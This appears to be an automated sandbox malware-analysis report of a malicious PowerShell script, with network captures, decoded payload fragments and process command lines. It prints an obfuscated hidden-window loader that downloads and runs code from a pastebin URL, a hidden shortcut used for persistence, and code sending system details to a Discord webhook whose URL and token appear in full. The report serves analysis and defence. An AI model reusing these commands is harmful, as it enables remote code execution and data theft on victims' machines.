                                                              2024-10-15 16:09:21 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                              Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                              2024-10-15 16:09:21 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                              Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                              2024-10-15 16:09:21 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                              Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                              2024-10-15 16:09:21 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                              Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                              2024-10-15 16:09:21 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                              Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.849718162.159.128.2334435884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-15 16:09:26 UTC311OUTPOST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Content-Type: application/json
                                                              Host: discord.com
                                                              Content-Length: 298
                                                              Connection: Keep-Alive
                                                              2024-10-15 16:09:26 UTC298OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 68 75 62 65 72 74 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 4f 32 46 38 35 54 53 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20
                                                              Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** O2F85TS\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                              2024-10-15 16:09:26 UTC1257INHTTP/1.1 404 Not Found
                                                              Date: Tue, 15 Oct 2024 16:09:26 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 45
                                                              Connection: close
                                                              Cache-Control: public, max-age=3600, s-maxage=3600
                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                              x-ratelimit-limit: 5
                                                              x-ratelimit-remaining: 4
                                                              x-ratelimit-reset: 1729008568
                                                              x-ratelimit-reset-after: 1
                                                              via: 1.1 google
                                                              alt-svc: h3=":443"; ma=86400
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gmtijUgBinxuq7zBWFRnhoCLKR%2B%2BoimY%2B16PB4QRuNrOwIO83B4YJvDfsk%2BjXHTYHnKaVzDZSlkIWEPSrtkiSQw2ECTA5c9X7pKQyU51gR2KQdQbrjt5Qw25a8Kj"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              X-Content-Type-Options: nosniff
                                                              Set-Cookie: __cfruid=4a7684d1b691875bfc1ab7beaff2ce99f545807f-1729008566; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                              Set-Cookie: _cfuvid=Wuj7nTdvMmmBf0zYtoS7fuUf5md1P3E7f.b6keOLwE4-1729008566891-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                              Server: cloudflare
                                                              CF-RAY: 8d3112d67de06bf6-DFW
                                                              2024-10-15 16:09:26 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                              Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.849719162.159.128.2334436592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-15 16:09:34 UTC311OUTPOST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Content-Type: application/json
                                                              Host: discord.com
                                                              Content-Length: 298
                                                              Connection: Keep-Alive
                                                              2024-10-15 16:09:34 UTC298OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 68 75 62 65 72 74 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 4f 32 46 38 35 54 53 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20
                                                              Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** O2F85TS\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                              2024-10-15 16:09:34 UTC1259INHTTP/1.1 404 Not Found
                                                              Date: Tue, 15 Oct 2024 16:09:34 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 45
                                                              Connection: close
                                                              Cache-Control: public, max-age=3600, s-maxage=3600
                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                              x-ratelimit-limit: 5
                                                              x-ratelimit-remaining: 4
                                                              x-ratelimit-reset: 1729008576
                                                              x-ratelimit-reset-after: 1
                                                              via: 1.1 google
                                                              alt-svc: h3=":443"; ma=86400
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GK6Muqmgmw%2BfnxVuu9SMrQBL7EYLwiSctF%2FwOrtz9AKbdXrSuQuG%2BRX2485RRUbOW9IsaYG28978nYDjQcSjooom3qBaWEGAGK3sxJNIkZFz5gGHD%2F9AYgryA%2Fl2"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              X-Content-Type-Options: nosniff
                                                              Set-Cookie: __cfruid=7a7c16a9ed016908acf78c66db20024985a87cff-1729008574; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                              Set-Cookie: _cfuvid=GsGcrzbZ.ReAvvZSACuq.itsHjGqUK2cRFp4U.kPG8U-1729008574688-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                              Server: cloudflare
                                                              CF-RAY: 8d3113072a384785-DFW
                                                              2024-10-15 16:09:34 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                              Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:12:08:49
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_phshop..ps1"
                                                              Imagebase:0x7ff6cb6b0000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:1
                                                              Start time:12:08:49
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:4
                                                              Start time:12:09:06
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\attrib.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                              Imagebase:0x7ff752370000
                                                              File size:23'040 bytes
                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              General

                                                              Target ID:5
                                                              Start time:12:09:07
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\forfiles.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                              Imagebase:0x7ff669f00000
                                                              File size:52'224 bytes
                                                              MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              General

                                                              Target ID:6
                                                              Start time:12:09:07
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:7
                                                              Start time:12:09:08
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                              Imagebase:0x7ff6cb6b0000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:8
                                                              Start time:12:09:08
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                              Imagebase:0x7ff6cb6b0000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:9
                                                              Start time:12:09:16
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\forfiles.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                              Imagebase:0x7ff669f00000
                                                              File size:52'224 bytes
                                                              MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              General

                                                              Target ID:10
                                                              Start time:12:09:16
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:11
                                                              Start time:12:09:16
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                              Imagebase:0x7ff6cb6b0000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:12
                                                              Start time:12:09:16
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                              Imagebase:0x7ff6cb6b0000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Executed Functions

                                                                Function 00007FFB4AB0BF26 Relevance: .5, Instructions: 473COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1688808426.00007FFB4AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffb4ab00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8d8a809e8f628bc4ef3f7165ede28ea3c0b96d1e2b09bcb4bf63c814f322e10c
                                                                • Instruction ID: c929781fde8bcd4ae29baee900cdf6331aedb5a8c9623fcf89a9eb4d0738e845
                                                                • Opcode Fuzzy Hash: 8d8a809e8f628bc4ef3f7165ede28ea3c0b96d1e2b09bcb4bf63c814f322e10c
                                                                • Instruction Fuzzy Hash: 8CF1C37090DA8D8FEBA9EF28C8457E937E1FF55310F1442AAE84DC7691DB3498458B82
                                                                Function 00007FFB4AB0CCD2 Relevance: .5, Instructions: 459COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1688808426.00007FFB4AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffb4ab00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 98533f4df5b808db979b2c6169e52a21b40c7b808e084285ca9a43141e54fb7d
                                                                • Instruction ID: 91b9e862f1977000cb5294492342c60f419813255b44caef09e0593178356d51
                                                                • Opcode Fuzzy Hash: 98533f4df5b808db979b2c6169e52a21b40c7b808e084285ca9a43141e54fb7d
                                                                • Instruction Fuzzy Hash: 50E1D37050DA8E8FEBA9EF38C8957E977D1EF55310F14426AD80DC7691CF38A8458B82
                                                                Function 00007FFB4ABD51B9 Relevance: .6, Instructions: 615COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689262612.00007FFB4ABD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffb4abd0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 331b5956f856e316f81c5fe5b472bac4aba75e87903ce4868f8ff4e7c625c3cb
                                                                • Instruction ID: 3f0259b986a21ea9f8833af43a77b01ad870e08a64de0e71a779222ba083853b
                                                                • Opcode Fuzzy Hash: 331b5956f856e316f81c5fe5b472bac4aba75e87903ce4868f8ff4e7c625c3cb
                                                                • Instruction Fuzzy Hash: F20277B1A0DB8A4FE795EF38C8546B47BE1EF59310B2842FAD44DC7193DA29AC05C741
                                                                Function 00007FFB4ABD207F Relevance: .6, Instructions: 604COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689262612.00007FFB4ABD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffb4abd0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b0a118e7c0ddfeade6bf8f9ad9f5c60f9b2eddf931a9f09d26a18e7a165e960f
                                                                • Instruction ID: 71e51e5d2f1d7a3806c334bc0fbf8054c75e580c68148627369aa14365f66311
                                                                • Opcode Fuzzy Hash: b0a118e7c0ddfeade6bf8f9ad9f5c60f9b2eddf931a9f09d26a18e7a165e960f
                                                                • Instruction Fuzzy Hash: 29121FB590DBCA4FE796EF38C8146A47BE1EF56310B1801FEE44DCB593DA28A806C751
                                                                Function 00007FFB4AB0F2A0 Relevance: .4, Instructions: 354COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1688808426.00007FFB4AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffb4ab00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 102eb2cffb964e3f9b90dc0e0b43a6a6f52b381720c0da654195165166e5f214
                                                                • Instruction ID: cf4fc51b3a184568cc4d6d312ef693f3468042b006b7b6574e2ab15bae678aad
                                                                • Opcode Fuzzy Hash: 102eb2cffb964e3f9b90dc0e0b43a6a6f52b381720c0da654195165166e5f214
                                                                • Instruction Fuzzy Hash: D0B1C5B1A1CA494FE759EF78C8956B87BD1FF99300F1541B9E48DD36D2CE28A8028781
                                                                Function 00007FFB4AB0C8E6 Relevance: .3, Instructions: 332COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1688808426.00007FFB4AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffb4ab00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e2d12a40d545f9523637fd5b6dda7348f015c83243e43129ae779952fbffbcf2
                                                                • Instruction ID: 0a7ef2e601db088455557c062ca6cd657b748b1b77fb49038f320c12c55e95f0
                                                                • Opcode Fuzzy Hash: e2d12a40d545f9523637fd5b6dda7348f015c83243e43129ae779952fbffbcf2
